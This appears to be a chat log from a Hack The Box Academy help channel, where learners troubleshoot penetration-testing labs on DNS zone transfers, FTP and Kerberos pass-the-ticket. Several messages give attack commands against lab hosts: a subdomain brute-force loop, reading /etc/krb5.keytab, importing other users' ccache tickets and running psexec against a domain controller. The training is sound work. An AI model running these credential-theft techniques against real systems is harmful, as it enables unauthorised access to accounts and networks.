Just us-academy-[1,2,3]
And eu-academy-[1,2]
The pwnbox has region names
Thats what I meant, moved to Pwnbox and did West and Im g2g
That's not the same as changing vpn regions
I used another Pwnbox region and it works now, that better?
Attacking common services > attacking ftp. I’ve scanned this six times there are no ftp ports open. Is there something wrong with this lab
You’ll have to reset the lab several times.
I faced a similar problem.
I didn’t I’ve
Did twice
PITA
I’ve seen many people complain about this, what’s up with this lab?
5th time worked
Hi guys, on attacking thick clients. Fatty-server.jar doesn't do anything when I run it. I'm assuming it should? I already had to backtrack because I messed up and it only let me download an empty file. This file is larger and can be decompiled so I guess its the right one this time. I did all the stuff to the end of module but then it wouldn't run. But yeah, it doesn't even run immediately after download. 🤷‍♂️
Is it thicker than a snicker?
Is it just me or has stability of labs been worse than usual lately
It’s terrible
Today at least it didn’t even show up ftp for the ftp lab until the 8th time now it’s slow as hell for a individual port scan
N/m I think I know what to do
Yes... That was the worst module so far.
This attacking ftp lab is so awful I have to reset it so many times
@next bronze i want to acces linux01 but every user status acces denied
There's a linux01 system ccache/ticket
checking
Still stucks...
After 2 try of burp intruder due to the end of the lab 😭.
i dont find /tmp and keytab and user directory
Well because the linux01$ keytab is kept somewhere else
Maybe the showcased tool can help you find it
FOOTPRINTING
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
HELP me pls
try to use other wordlists
Find all Zones
Hi, experiencing connectivity issues today to the windows "machines", both from vpn and pwnbox. Is it just me ?
I tried them all and only 1 of them allows transfer @acoustic owl
A zone does not necessarily have to allow a zone transfer. The module shows you what you can do in such a case.
@acoustic owl For example, from an address we found (vpn.internal.inlanefreight.htb) we will make a bruteforce attack again ?
Yes, you can try to see if you can find a host with the help of a list.
But think about which subdomains are probably hosts and which might be a zone
@acoustic owl for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.ns.internal.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
I tried all of them but no result
Attacking FTP from the attacking common services. I have reset this lab switch servers all types of things and for some reason, I am not able to get on the port 2121 anymore. This lab is most likely broke or something. Reached out to support and he just says “it works for me”, others in the prior chats have said it’s a known issue. What should I do?
try pwnbox
Your list is far too big
Take a small list. Anything more than 4999 entries is too big
@acoustic owl I changed it to 5000 but I still can't find it ( for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt);do dig $sub.ns.internal.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
) Is this part correct? sub.ns.internal.inlanefreight.htb
5000 is too big 🙂
its half
hey guys, On module "Password Attacks", Section "Pass the Ticket (PtT) from Linux" the very first question says " SSH to 10.129.23.109 with user "david@inlanefreight.htb" and password "Password2"
Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory." I added inlanefreight.htb to my /etc/hosts but when trying to ssh it says "permission denied."
is there a way to see how much cubes you get from completing a module?
Anyone who has done ATTACKING COMMON APPLICATIONS on Academy do you know if it includes a section on phpmyadmin? it comes up in the website search but doesn't mention it in the brief/description
Yes check your profile
could someone help me?
DM me
No wait I think I found it.
nice
Not sure but my script returned more that one line "Testing $filename".
the modules are individual lessons, not paths, you need to go to the paths section for that i think
Is there a beginner path?
Yes
If you look under the "paths" section there's the Information Security Fundamentals path
Should I do hackthebox academy or do try hack me for a while and return to htba
Htba will be better
It actually mostly is explaining things and giving you a lab to practice on
Will I be doing actual htb labs at the end of a path or something?
every module you have hands on practice and a test to ensure you've learned the lesson
Is the info in the lesson correct? I read that sometimes they give misinformation and stuff
This question really confused me. Do I need to access it by pivoting? I'm already on a linux01 machine
Pivoting not required
The info is correct
It is correct. Everyone makes mistakes, don't get me wrong, but HTB has the best quality and content for learning about this stuff. You won't find a better training resource.
There is a machine ccache file that allows the machine access to the domain
Also I read that the labs sometimes are very hard and out of syllabus for the lesson they just taught.
Ok
that file is on the dc01 machine ?
pentesting is not easy
I've only ran into that maybe once
Everyone makes mistakes indeed. Hope the site is in a really good state right now
I would highly recommend
It's generally always been in a good state for knowledge
No
It's on the linux01 machine you're on
Respond for this message please
I did
Pentesting is not easy?
The module and sections prepare you for the labs
sudo smbclient -U david \\10.129.192.47\david -t 60
[sudo] password for murali:
Password for [WORKGROUP\david]:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Fri Feb 11 16:13:03 2022
.. D 0 Fri Feb 11 16:13:03 2022
Backup.vhd A 136315392 Fri Feb 11 17:46:12 2022
10328063 blocks of size 4096. 6119444 blocks available
smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: > getting file \Backup.vhd of size 136315392 as Backup.vhd SMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now
I am unable to download the file any help?
Reset lab or change vpn regions and download a new file
That's not what I said
i did it like 3 times now
Also why are you adding -t 60
i thought that it is beacuse of timeout so i increased the timeout with that
The error you're getting btw is a connection error
how -_- this machine have julio david carlos..
It's not in /tmp
What did u say. Sorry I can't tell what you said
You are very often given the tools to answer the questions even if it's not copy/paste from the examples
Ok
There is a tool mentioned at the end of the section that can do a lot of the enum for you
I also said this way earlier
still stuck guys need help
I'm sorry I didn't realize it, I understand it now but I'll try it right away.
It's david@inlanefreight.htb@ip
The username is david@inlanefreight.htb
Thanks
It's not disallowed
But it's better to learn the CLI stuff
And once you learn CLI, the GUI will seem dumb
Perhaps there's others
this command its true?
kinit linux01@inlanefreight.htb -k -t /etc/krb5.keytab
bcs no accepted format
I didn't use that file
yeah thats the wrong file
Also it would be linux01$
oh understand wrong file
I thought it was correct when I saw Linux 01 ntlm or something like that in this file.
Well, it's not
Guys. To unlock one tier 3 module I need 50usd. Isn't that expensive af? 😮😮
It's cheaper if you do a monthly subscription
Also, I wouldn't worry about t3 until you get the basics
Hi can someone please help me here >Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop. < || i tried psexec.py FREIGHTLOGISTICS.LOCAL/sapxxx@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -target-ip 172.16.5.xxx with password Pxxxxsso and i tried evilwinrm as well ||
and i have connection vv,:
Your screenshots still contain spoilers, (marking as spoiler still does little-to-nothing) but it sounds like some auth errors to the DC. Is it in your hosts file?
Is it in there as both DC03 and the fqdn?
No it's not
You just have the FQDN in there
Also you should use the DOMAIN/USER for the account
okay thank you
Hi everyone nice to be in this group! i have an issue getting started with my first module on hackthebox. When i connect the openvpn on my virtualbox kali i get a notification saying successful (also on the website) but when i ping the ipadress it pings endlessly in a loop. How can i fix this? Does anyone know. Thanks for all the help
are you pinging a box from kali?
Hi, I want to know what is the best way starting off with knocking the boxes from intermediate to advanced ?
Ping always goes until you stop it in linux
Unless specified
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Yes kali is installed on the virtual box on my laptop and connected to the internet via bridge eth0 setup
yeah then the ping command will continue until you send a command break
Thanks for clearing me up on that
You can do -c 5 I believe to only have it ping 5 times
I have been struggling getting out of a command in VB. The usual Cmd+C is not linked to the virtual os. Anyone have experience with how to set it up correctly? Also much appreciated!
Thanks for the reminder totally neglected to limit this
Cmd/ctrl c should end it
thanks a lot @fathom pendant
by chance, are you using macOS as your host OS
But it could be that your keyboard is a different layout, so you'd need to change in settings
Thanks for the link!
This time it’s windows on my host
ok
Cmd isn't a windows key
Ctrl+C should command break then
Ok i will try to figure this out
It sounds like you can type fine so it might not be a layout issue
Just a user error
I tried that instead what happens is the virtual window itself does something and exits fullscreen (if i’m in it)
hm
Are you using the right or left ctrl key
Generally everything seems to work just the command C is something different. I once managed by accident but didnt register what i had typed
The right key is the host escape key in virtualbox
The left one usually
Just to clarify by command key “ctrl” is meant right?
i don't know much about VirtualBox so i can't say for certain
Yes
I have a german keyboard layout so i have to translate sometimes to be sure
That's likely it
Thanks for your help though
You'll have to look up and Google settings that work
Alright. I will try that thank you!
You can remap the host escape key in virtualbox I believe
Yes this I successfully did. And it works. I tried the same with the command key but didn’t seem to work yet
Yeah that might be needing to go into the keyboard settings in your vm and changing it to a German keyboard layout
Here's a list of many ways
I have a further question with the general usage. I tried the introductory problem “meow”. And generally everything was fine in the beginning until i hit “submit root flag”. While i dont want you to spoiler me the result itself i am curious do i need to use the terminal to get my answer or is it all within the app/website? (Kinda how i got to the whole pinging and command topic in the first place)
Amazing thank you for the link
That's a starting-point machine, not academy module
Pinging just tells you a host is up
You need to scan, enumerate, and exploit your way through the system
Sorry for the misunderstanding i called it module by reflex.
#starting-point is the place to ask about those, you'll need to read and follow #welcome to access it
Ok so i did understand it correctly and i interact with the website and machine via my local terminal (like in real life sort of)
Via the linux vm you're using
Alright!
If there's a webpage running, you can use a browser to see it
Gotcha
The starting point machines all have walk-throughs to help guide you
The root flag is the flag found at /root/flag.txt usually
Yeah i’m not quite getting the same results as the walkthrough so i’m spending some extra time figuring out what i did wrong
You might not
As the walk-through might be using older versions of tools
So tool output may differ
Ah ok thats good to know
We're straying off-topic for the channel
Read and follow #welcome to access more of the server
Thank you so much for your time and effort to help me out it has been very useful to me!
could someone help me with "Password Attacks" section "Pass the Ticket (PtT) from Linux"
Maybe if you ask your question here
This Question "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."
there was a ccache file in the /tmp folder, i tried using it like export KRB5CCNAME= but it doesnt work
like after that i tried using smbclient //dc01/julio -k
doesnt work
There are multiple ccache files
yea
it says this "gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/DC01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER"
common services easy box. i need a nudge for initial user foothold
i cant anon into ftp, and user-enum wont find anything. not sure if i am doing something wrong
also hydra wont crack anything
i should use smbclient right??
humangod i need help again
target the mail services.
how can I help?
Anyone know how to open the docx file on medium skill assessment on password attacks module? Can’t install libre on the parrot os jump
you can send it over to a windows vm / machine and open it word.
Thought that but kind of expected hack the box to provide the method haha
Set your timeout for longer
on user-enum?
password attacks?
and none of them worked?
yeah
what user are you now?
svc_workstation
waiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiit a second..... am i supposed to use the password file i got in the very first section not the one that was provided
escalate to root and recheck /tmp. sudo -l
i am root now
alright so try impersonating them now,
they dont work
like i tried running linikatz the ccache files it showed for the julios user i tried using them they didnt work
should i get the ntlm hash and then crack it?
no.
how are you importing the ccache?
I just did this the intended way and it worked fine
export KRB5CCNAME=/tmp/krb5cc_64740###########
I am stuck on the footprinting module, DNS portion:
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
there's 2 julio krb5cc in /tmp/
i tried both of them
i can confirm that it is not impossible, look for 127.0.0.1 in your enum
if you tried both - then you'd have the answer
With this command? dig axfr inlanefreight.htb @10.129.14.128
Kool
you can use subdomains with dig
could i dm you?
dig <subdomain>.inlanefreight.htb @ip
Am I supposed to bruteforce for the subdomain w/GoBuster etc...?
so that's how you'd zone transfer deeper
maybe copy the ccache to the root dir and do it there.
nope
not sure it will help, but its worth a try/
you should be able to do a regular zone transfer and get a bunch of results
i did it without copying to root
the first i tried was expired (of course) but the second worked fine
I would reset then if you think you are doing everything right.
Can someone please help me with this math, or is it a typo?
128 to 191 is 63, not 64, right?
How are they getting 64 total subnets?
; <<>> DiG 9.18.24-1-Debian <<>> ns.inlanefreight.htb 10.129.85.160
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 5418
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;ns.inlanefreight.htb. IN A
;; AUTHORITY SECTION:
. 460 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024040302 1800 900 604800 86400
;; Query time: 110 msec
;; SERVER: 192.168.12.1#53(192.168.12.1) (UDP)
;; WHEN: Wed Apr 03 13:42:14 MDT 2024
;; MSG SIZE rcvd: 124
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 60330
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;10.129.85.160. IN A
;; AUTHORITY SECTION:
. 460 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024040302 1800 900 604800 86400
;; Query time: 106 msec
;; SERVER: 192.168.12.1#53(192.168.12.1) (UDP)
;; WHEN: Wed Apr 03 13:42:14 MDT 2024
;; MSG SIZE rcvd: 117
I don't see a TXT record in this output to submit for the answer?
why are you digging the nameserver?
there's also another 127.0.0.1 on the initial dig
it's counting 128 as 1
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
That's all there is.
I thought I was too.
If I start the count at 128 and end on 191, I get 63.
there shouldn't be
the difference is 63
add 1 more
Hm… well ok.
Thanks for the reply.
Of all the things to be so confusing...DNS.
it's really not that confusing tbh
internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
This is the only record under 127.0.0.1
I've reset it, same result.
dig axfr inlanefreight.htb @10.129.176.117
wait maybe i'm misremembering this part hold on
Sure.
yeah sorry i'm mixing this up with something else
but just try all the subdomains in that list
surely one of them has what you're looking for
How do you get root kali in kali Linux
google is your friend here
you don't need to skip
su -
it literally takes a few seconds to do
and the last question just requires you to use the shown tool on the section
i'm telling you literally what to do btw; i'm not being cheeky - just try them since it's a small list
How do I get root kali in kali Linux
mate, i've already answered your question.
this also isn't the place to be asking.
sudo su
you're still looking for the linux01 file?
the domain daemon has to connect to the domain somehow
maybe check its files
Doing linux fundamentals, having an issue with the find section. I believe my command is correct as it's trying to find, but it's giving me permission denied on every folder so I can't get any info. What am I doing wrong?
||Here is the command I'm running: find / -type f -name *.conf -size +25k -newermt 20202-03-03 -exec ls -al {} ;||
there are some directories that you don't have permission to read so you'll get permission denied on those
which is why you add 2>/dev/null at the end of the command to output stderr to null
that way you won't see a whole bunch of errors
i've done that, but it gives no info at that point because its all error
have you checked the date that you put for the command?
omg lol. let me try that...
i'll do you an even bigger hint: are you connected to the target ip?
I'm officially a dumb ass, thank you @dim wolf
we've all been there
I was at least connected LOL
Appreciate you guys. Stoked to get these skills under my belt, such a fascinating field.
It's okay. I'm just a bit insecure when I'm learning.
well you gotta break out of that tbh
Well, step 1 is admitting fault.
lots of things that you'll learn beyond that will challenge you
Already completed that.
CPTS doesn't really deal with coding
ugh i need another nudge i got into the db and im guessing i have to load file but what file
I'm learning how to code on my own, data structures and algorithms in Python.
its either an sql injection or im stupid
i think you're overthinking it
HTB is a lot better than OffSec, I've learned a ton 🙂
What are you looking at?
im in the common services easy lab looking at sql
also; don't just immediately rush to the discord when you need help
try and first walk through the problem in your head
and work through issues
it's fine to get stuck and need help
but it seems like you get stuck and immediately rush for help
Marcie, it helps some of us to help others though. It helps me retain information anyway.
the suffering is necessary
Dude, why do you think I help so much
And I'm not gatekeeping anything
I didn't say you were.
I'm assisting people in understanding the mindset that would be required for the exam
An interesting take to be sure.
The struggle is needed to improve
At what point is the bird forced to fly?
When the mother pushes it out the nest
True. I don't think you can rely on discord during your exam.
Indeed...
Nope
Outside help will get you and whoever helps you banned, and certification revoked
you will retain information a lot more if you struggle to find that answer
I mean that's a different thing though.
@bright spire I will tell you, there's 2 ways
it means you understand what to look for and why something works that way
Have you checked ftp for info?
Hmmm, yes but not everything reveals itself through repeated failure.
I've learned that as well, I could be told something a million times and not retain it, but doing it hands on and problem-solving myself before relying on others retains it 99% of the time.
of course not but you don't just keep trying something that you know doesn't work, that's wasted effort
Everyone is different, and every topic is unique to the learner.
you enumerate, you exhaust all your options, you enumerate again, you exhaust new options...
Which is also why I don't believe in outright just giving someone the answer
Or pointing someone at the direct command for the answer
But to your credit, I did get it 😉
only until you feel like you can't find anything new, you ask for help
I just did the dns section off of what's given by the server and module section to at least sanity check
Yeah. I don't like DNS :/
So I can say, getting all the answers is possible with the provided tools
You might need a different wordlist for the last question of the section
But overall running the dnsenum command against the found subdomains then grepping for 203 until you find it works well
Either manually or a simple loop
Hello, I have a troubleshoot problems here in Thick web-client application


